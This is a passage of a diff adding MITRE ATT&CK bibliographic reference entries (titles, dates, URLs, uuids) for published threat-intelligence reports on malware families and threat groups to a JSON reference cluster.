"date_accessed": "2021-06-07T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps" + ], + "source": "MITRE", + "title": "New-InboxRule" + }, + "related": [], + "uuid": "54fcfc36-e0d5-422f-8a45-eeb7fa077a93", + "value": "Microsoft New-InboxRule" + }, + { + "description": "Moncur, Rob. (2020, July 5). New Information in the AWS IAM Console Helps You Follow IAM Best Practices. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2020-07-05T00:00:00Z", + "refs": [ + "https://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhere-to-iam-best-practices/" + ], + "source": "MITRE", + "title": "New Information in the AWS IAM Console Helps You Follow IAM Best Practices" + }, + "related": [], + "uuid": "dadae802-91a7-46d4-aacd-48f49f22854e", + "value": "AWS - IAM Console Best Practices" + }, + { + "description": "Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.", + "meta": { + "date_accessed": "2021-08-11T00:00:00Z", + "date_published": "2021-02-05T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + ], + "source": "MITRE", + "title": "New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker" + }, + "related": [], + "uuid": "64a86a3f-0160-4766-9ac1-7d287eb2c323", + "value": "Trend Micro Ransomware February 2021" + }, + { + "description": "Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.", + "meta": { + "date_accessed": "2018-03-15T00:00:00Z", + "date_published": "2018-03-08T00:00:00Z", + "refs": [ + "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities" + ], + "source": "MITRE", + "title": "New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities" + }, + "related": [], + "uuid": "1641553f-96e7-4829-8c77-d96388dac5c7", + "value": "Avast CCleaner3 2018" + }, + { + "description": "Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2017-04-06T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" + ], + "source": "MITRE", + "title": "New IoT/Linux Malware Targets DVRs, Forms Botnet" + }, + "related": [], + "uuid": "95b5b03e-f160-47cf-920c-8f4f3d4114a3", + "value": "Tsunami" + }, + { + "description": "Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.", + "meta": { + "date_accessed": "2018-02-19T00:00:00Z", + "date_published": "2017-04-06T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" + ], + "source": "MITRE", + "title": "New IoT/Linux Malware Targets DVRs, Forms Botnet" + }, + "related": [], + "uuid": "489a6c57-f64c-423b-a7bd-169fa36c4cdf", + "value": "amnesia malware" + }, + { + "description": "ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.", + "meta": { + "date_accessed": "2022-06-06T00:00:00Z", + "date_published": "2021-08-01T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/siamesekitten/" + ], + "source": "MITRE", + "title": "New Iranian Espionage Campaign By “Siamesekitten” - Lyceum" + }, + "related": [], + "uuid": "9485efce-8d54-4461-b64e-0d15e31fbf8c", + "value": "ClearSky Siamesekitten August 2021" + }, + { + "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2018-09-27T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/" + ], + "source": "MITRE", + "title": "New KONNI Malware attacking Eurasia and Southeast Asia" + }, + "related": [], + "uuid": "f3d3b9bc-4c59-4a1f-b602-e3e884661708", + "value": "Unit 42 NOKKI Sept 2018" + }, + { + "description": "Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.", + "meta": { + "date_accessed": "2021-03-02T00:00:00Z", + "date_published": "2020-06-04T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/" + ], + "source": "MITRE", + "title": "New LNK attack tied to Higaisa APT discovered" + }, + "related": [], + "uuid": "6054e0ab-cf61-49ba-b7f5-58b304477451", + "value": "Malwarebytes Higaisa 2020" + }, + { + "description": "Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.", + "meta": { + "date_accessed": "2016-01-25T00:00:00Z", + "date_published": "2015-08-05T00:00:00Z", + "refs": [ + "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" + ], + "source": "MITRE", + "title": "Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”" + }, + "related": [], + "uuid": "b1540c5c-0bbc-4b9d-9185-fae224ba31be", + "value": "Gallagher 2015" + }, + { + "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2017-11-28T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" + ], + "source": "MITRE", + "title": "Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection" + }, + "related": [], + "uuid": "9737055a-f583-448e-84d0-1d336c4da9a8", + "value": "FireEye TLS Nov 2017" + }, + { + "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.", + "meta": { + "date_accessed": "2019-06-05T00:00:00Z", + "date_published": "2017-11-28T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" + ], + "source": "MITRE", + "title": "Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection" + }, + "related": [], + "uuid": "32c0b9d2-9f31-4e49-8b3a-c63ff4fffa47", + "value": "FireEye Ursnif Nov 2017" + }, + { + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2017-01-18T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + ], + "source": "MITRE", + "title": "New Mac backdoor using antiquated code" + }, + "related": [], + "uuid": "165edb01-2681-45a3-b76b-4eb7dee5dab9", + "value": "Antiquated Mac Malware" + }, + { + "description": "Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.", + "meta": { + "date_accessed": "2020-12-02T00:00:00Z", + "date_published": "2020-11-27T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html" + ], + "source": "MITRE", + "title": "New MacOS Backdoor Connected to OceanLotus Surfaces" + }, + "related": [], + "uuid": "43726cb8-a169-4594-9323-fad65b9bae97", + "value": "Trend Micro MacOS Backdoor November 2020" + }, + { + "description": "Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.", + "meta": { + "date_accessed": "2018-11-13T00:00:00Z", + "date_published": "2018-04-04T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + ], + "source": "MITRE", + "title": "New MacOS Backdoor Linked to OceanLotus Found" + }, + "related": [], + "uuid": "e18ad1a7-1e7e-4aca-be9b-9ee12b41c147", + "value": "TrendMicro MacOS April 2018" + }, + { + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.", + "meta": { + "date_accessed": "2020-08-10T00:00:00Z", + "date_published": "2020-05-11T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/" + ], + "source": "MITRE", + "title": "New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability" + }, + "related": [], + "uuid": "0ef8691d-48ae-4057-82ef-eb086c05e2b9", + "value": "TrendMicro macOS Dacls May 2020" + }, + { + "description": "Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2015-06-04T00:00:00Z", + "refs": [ + "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html" + ], + "source": "MITRE", + "title": "New Mac OS Malware Exploits Mackeeper" + }, + "related": [], + "uuid": "8c4bcbc7-ff52-4f7b-a22e-98bf9cfb1040", + "value": "OSX Malware Exploits MacKeeper" + }, + { + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", + "meta": { + "date_accessed": "2019-08-08T00:00:00Z", + "date_published": "2019-02-12T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/" + ], + "source": "MITRE", + "title": "New macOS Malware Variant of Shlayer (OSX) Discovered" + }, + "related": [], + "uuid": "d8212691-4a6e-49bf-bc33-740850a1189a", + "value": "Carbon Black Shlayer Feb 2019" + }, + { + "description": "Ray, V., Hayashi, K. (2016, February 29). New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.", + "meta": { + "date_accessed": "2016-02-29T00:00:00Z", + "date_published": "2016-02-29T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" + ], + "source": "MITRE", + "title": "New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan" + }, + "related": [], + "uuid": "bbdf3f49-9875-4d41-986d-b693e82c77e1", + "value": "Palo Alto Rover" + }, + { + "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", + "meta": { + "date_accessed": "2017-11-16T00:00:00Z", + "date_published": "2017-11-10T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + ], + "source": "MITRE", + "title": "New Malware with Ties to SunOrcal Discovered" + }, + "related": [], + "uuid": "69fbe527-2ec4-457b-81b1-2eda65eb8442", + "value": "Palo Alto Reaver Nov 2017" + }, + { + "description": "Trend Micro. (2018, September 19). New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2018-09-19T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-multi-platform-xbash-packs-obfuscation-ransomware-coinminer-worm-and-botnet" + ], + "source": "MITRE", + "title": "New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet" + }, + "related": [], + "uuid": "a4b37a24-b2a0-4fcb-9ec3-0d6b67e4e13b", + "value": "Trend Micro Xbash Sept 2018" + }, + { + "description": "MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.", + "meta": { + "date_accessed": "2021-08-04T00:00:00Z", + "date_published": "2021-06-25T00:00:00Z", + "refs": [ + "https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/" + ], + "source": "MITRE", + "title": "New Nobelium activity" + }, + "related": [], + "uuid": "1588799f-a5d2-46bc-978d-f10ed7ceb15c", + "value": "MSRC Nobelium June 2021" + }, + { + "description": "Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.", + "meta": { + "date_accessed": "2018-05-08T00:00:00Z", + "date_published": "2018-04-23T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + ], + "source": "MITRE, Tidal Cyber", + "title": "New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia" + }, + "related": [], + "uuid": "eee5efa1-bbc6-44eb-8fae-23002f351605", + "value": "Symantec Orangeworm April 2018" + }, + { + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "meta": { + "date_accessed": "2017-07-10T00:00:00Z", + "date_published": "2017-07-07T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + ], + "source": "MITRE", + "title": "New OSX.Dok malware intercepts web traffic" + }, + "related": [], + "uuid": "71d65081-dada-4a69-94c5-f1d8e4e151c1", + "value": "OSX.Dok Malware" + }, + { + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2016-07-06T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + ], + "source": "MITRE", + "title": "New OSX/Keydnap malware is hungry for credentials" + }, + "related": [], + "uuid": "d43e0dd1-0946-4f49-bcc7-3ef38445eac3", + "value": "OSX Keydnap malware" + }, + { + "description": "Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.", + "meta": { + "date_accessed": "2019-09-06T00:00:00Z", + "date_published": "2018-04-24T00:00:00Z", + "refs": [ + "https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/" + ], + "source": "MITRE", + "title": "New OSX/Shlayer Malware Variant Found Using a Dirty New Trick" + }, + "related": [], + "uuid": "3ca1254c-db51-4a5d-8242-ffd9e4481c22", + "value": "Intego Shlayer Apr 2018" + }, + { + "description": "Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2019-06-13T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability" + ], + "source": "MITRE", + "title": "New Pervasive Worm Exploiting Linux Exim Server Vulnerability" + }, + "related": [], + "uuid": "9523d8ae-d749-4c25-8c7b-df2d8c25c3c8", + "value": "Cybereason Linux Exim Worm" + }, + { + "description": "MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "meta": { + "date_accessed": "2023-01-19T00:00:00Z", + "date_published": "2022-10-14T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + ], + "source": "MITRE", + "title": "New “Prestige” ransomware impacts organizations in Ukraine and Poland" + }, + "related": [], + "uuid": "b57e1181-461b-5ada-a739-873ede1ec079", + "value": "Microsoft Prestige ransomware October 2022" + }, + { + "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.", + "meta": { + "date_accessed": "2020-05-27T00:00:00Z", + "date_published": "2019-03-04T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/" + ], + "source": "MITRE", + "title": "New Python-Based Payload MechaFlounder Used by Chafer" + }, + "related": [], + "uuid": "2263af27-9c30-4bf6-a204-2f148ebdd17c", + "value": "Unit 42 MechaFlounder March 2019" + }, + { + "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", + "meta": { + "date_accessed": "2019-03-26T00:00:00Z", + "date_published": "2016-06-27T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" + ], + "source": "MITRE", + "title": "New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide" + }, + "related": [], + "uuid": "c76e806c-b0e3-4ab9-ba6d-68a9f731f127", + "value": "Talos Nyetya June 2017" + }, + { + "description": "Cyble. (2022, May 6). New ransomware variant targeting high-value organizations. Retrieved March 7, 2023.", + "meta": { + "date_accessed": "2023-03-07T00:00:00Z", + "date_published": "2022-05-06T00:00:00Z", + "refs": [ + "https://blog.cyble.com/2022/05/06/black-basta-ransomware/" + ], + "source": "MITRE", + "title": "New ransomware variant targeting high-value organizations" + }, + "related": [], + "uuid": "18035aba-0ae3-58b8-b426-86c2e38a37ae", + "value": "Cyble Black Basta May 2022" + }, + { + "description": "Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2020-10-23T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/" + ], + "source": "MITRE", + "title": "New RAT malware gets commands via Discord, has ransomware feature" + }, + "related": [], + "uuid": "a587ea99-a951-4aa8-a3cf-a4822ae97490", + "value": "Bleepingcomputer RAT malware 2020" + }, + { + "description": "Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.", + "meta": { + "date_accessed": "2021-03-08T00:00:00Z", + "date_published": "2020-07-16T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/" + ], + "source": "MITRE", + "title": "New Research Exposes Iranian Threat Group Operations" + }, + "related": [], + "uuid": "523b7a1e-88ef-4440-a7b3-3fd0b8d5e199", + "value": "IBM ITG18 2020" + }, + { + "description": "Irwin, Ullrich, J. (2009, March 16). new rogue-DHCP server malware. Retrieved January 14, 2022.", + "meta": { + "date_accessed": "2022-01-14T00:00:00Z", + "date_published": "2009-03-16T00:00:00Z", + "refs": [ + "https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/" + ], + "source": "MITRE", + "title": "new rogue-DHCP server malware" + }, + "related": [], + "uuid": "8e0a8a9a-9b1f-4141-b595-80b98daf6b68", + "value": "new_rogue_DHCP_serv_malware" + }, + { + "description": "NCSC, CISA, FBI, NSA. (2022, February 23). New Sandworm malware Cyclops Blink replaces VPNFilter. Retrieved March 3, 2022.", + "meta": { + "date_accessed": "2022-03-03T00:00:00Z", + "date_published": "2022-02-23T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter" + ], + "source": "MITRE", + "title": "New Sandworm malware Cyclops Blink replaces VPNFilter" + }, + "related": [], + "uuid": "bee6cf85-5cb9-4000-b82e-9e15aebfbece", + "value": "NCSC CISA Cyclops Blink Advisory February 2022" + }, + { + "description": "Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "date_published": "2014-05-29T00:00:00Z", + "refs": [ + "https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering" + ], + "source": "MITRE", + "title": "Newscaster Threat Uses Social Media for Intelligence Gathering" + }, + "related": [], + "uuid": "a3407cd2-d579-4d64-8f2e-162c31a99534", + "value": "Eweek Newscaster and Charming Kitten May 2014" + }, + { + "description": "Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2019-04-02T00:00:00Z", + "refs": [ + "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/" + ], + "source": "MITRE", + "title": "New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload" + }, + "related": [], + "uuid": "529524c0-123b-459c-bc6f-62aa45c228d1", + "value": "Deep Instinct TA505 Apr 2019" + }, + { + "description": "Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.", + "meta": { + "date_accessed": "2017-07-17T00:00:00Z", + "date_published": "2013-07-15T00:00:00Z", + "refs": [ + "http://www.thesafemac.com/new-signed-malware-called-janicab/" + ], + "source": "MITRE", + "title": "New signed malware called Janicab" + }, + "related": [], + "uuid": "1acc1a83-faac-41d3-a08b-cc3a539567fb", + "value": "Janicab" + }, + { + "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.", + "meta": { + "date_accessed": "2021-05-28T00:00:00Z", + "date_published": "2021-05-27T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" + ], + "source": "MITRE", + "title": "New sophisticated email-based attack from NOBELIUM" + }, + "related": [], + "uuid": "047ec63f-1f4b-4b57-9ab5-8a5cfcc11f4d", + "value": "MSTIC NOBELIUM May 2021" + }, + { + "description": "Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.", + "meta": { + "date_accessed": "2020-05-27T00:00:00Z", + "date_published": "2019-03-27T00:00:00Z", + "refs": [ + "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/" + ], + "source": "MITRE", + "title": "New steps to protect customers from hacking" + }, + "related": [], + "uuid": "c55a112d-4b05-4c32-a5b3-480b12929115", + "value": "Microsoft Phosphorus Mar 2019" + }, + { + "description": "Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.", + "meta": { + "date_accessed": "2021-03-12T00:00:00Z", + "date_published": "2021-03-04T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html" + ], + "source": "MITRE", + "title": "New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452" + }, + "related": [], + "uuid": "1cdb8a1e-fbed-4db3-b273-5f8f45356dc1", + "value": "FireEye SUNSHUTTLE Mar 2021" + }, + { + "description": "Blasco, J. (2013, March 21). New Sykipot developments [Blog]. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2013-03-21T00:00:00Z", + "refs": [ + "http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments" + ], + "source": "MITRE", + "title": "New Sykipot developments [Blog]" + }, + "related": [], + "uuid": "46be6b77-ee2b-407e-bdd4-5a1183eda7f3", + "value": "Blasco 2013" + }, + { + "description": "Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2017-03-27T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/" + ], + "source": "MITRE", + "title": "New targeted attack against Saudi Arabia Government" + }, + "related": [], + "uuid": "735647f9-9cd4-4a20-8812-4671a3358e46", + "value": "Malwarebytes Targeted Attack against Saudi Arabia" + }, + { + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-07T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit" + }, + "related": [], + "uuid": "88f41728-08ad-4cd8-a418-895738d68b04", + "value": "FireEye APT34 Dec 2017" + }, + { + "description": "Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.", + "meta": { + "date_accessed": "2018-12-11T00:00:00Z", + "date_published": "2018-10-25T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/" + ], + "source": "MITRE", + "title": "New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed" + }, + "related": [], + "uuid": "8956f0e5-d07f-4063-bf60-f8b964d03e6d", + "value": "Unit 42 Cobalt Gang Oct 2018" + }, + { + "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.", + "meta": { + "date_accessed": "2018-11-27T00:00:00Z", + "date_published": "2018-10-11T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + ], + "source": "MITRE", + "title": "New TeleBots backdoor: First evidence linking Industroyer to NotPetya" + }, + "related": [], + "uuid": "56372448-03f5-49b5-a2a9-384fbd49fefc", + "value": "ESET TeleBots Oct 2018" + }, + { + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "meta": { + "date_accessed": "2018-08-02T00:00:00Z", + "date_published": "2018-07-27T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + ], + "source": "MITRE, Tidal Cyber", + "title": "New Threat Actor Group DarkHydrus Targets Middle East Government" + }, + "related": [], + "uuid": "800279cf-e6f8-4721-818f-46e35ec7892a", + "value": "Unit 42 DarkHydrus July 2018" + }, + { + "description": "Tudorica, R., Maximciuc, A., Vatamanu, C. (2020, March 18). New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong. Retrieved March 15, 2021.", + "meta": { + "date_accessed": "2021-03-15T00:00:00Z", + "date_published": "2020-03-18T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf" + ], + "source": "MITRE", + "title": "New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong" + }, + "related": [], + "uuid": "2ccdaded-97f6-47e2-b6c0-9a83e8a945d6", + "value": "Bitdefender Trickbot March 2020" + }, + { + "description": "Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.", + "meta": { + "date_accessed": "2022-01-05T00:00:00Z", + "date_published": "2021-08-23T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/" + ], + "source": "MITRE", + "title": "New variant of Konni malware used in campaign targetting Russia" + }, + "related": [], + "uuid": "fb8c6402-ec18-414a-85f7-3d76eacbd890", + "value": "Malwarebytes Konni Aug 2021" + }, + { + "description": "Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.", + "meta": { + "date_accessed": "2019-06-18T00:00:00Z", + "date_published": "2018-05-10T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign" + ], + "source": "MITRE", + "title": "New Vega Stealer shines brightly in targeted campaign" + }, + "related": [], + "uuid": "c52fe62f-4df4-43b0-a126-2df07dc61fc0", + "value": "Proofpoint Vega Credential Stealer May 2018" + }, + { + "description": "Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.", + "meta": { + "date_accessed": "2018-11-29T00:00:00Z", + "date_published": "2018-07-30T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ], + "source": "MITRE", + "title": "New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign" + }, + "related": [], + "uuid": "a85c869a-3ba3-42c2-9460-d3d1f0874044", + "value": "Proofpoint Azorult July 2018" + }, + { + "description": "Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021.", + "meta": { + "date_accessed": "2021-04-13T00:00:00Z", + "date_published": "2020-01-31T00:00:00Z", + "refs": [ + "https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong" + ], + "source": "MITRE", + "title": "New wave of PlugX targets Hong Kong | Avira Blog" + }, + "related": [], + "uuid": "bc7755a0-5ee3-477b-b8d7-67174a59d0e2", + "value": "Avira Mustang Panda January 2020" + }, + { + "description": "Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 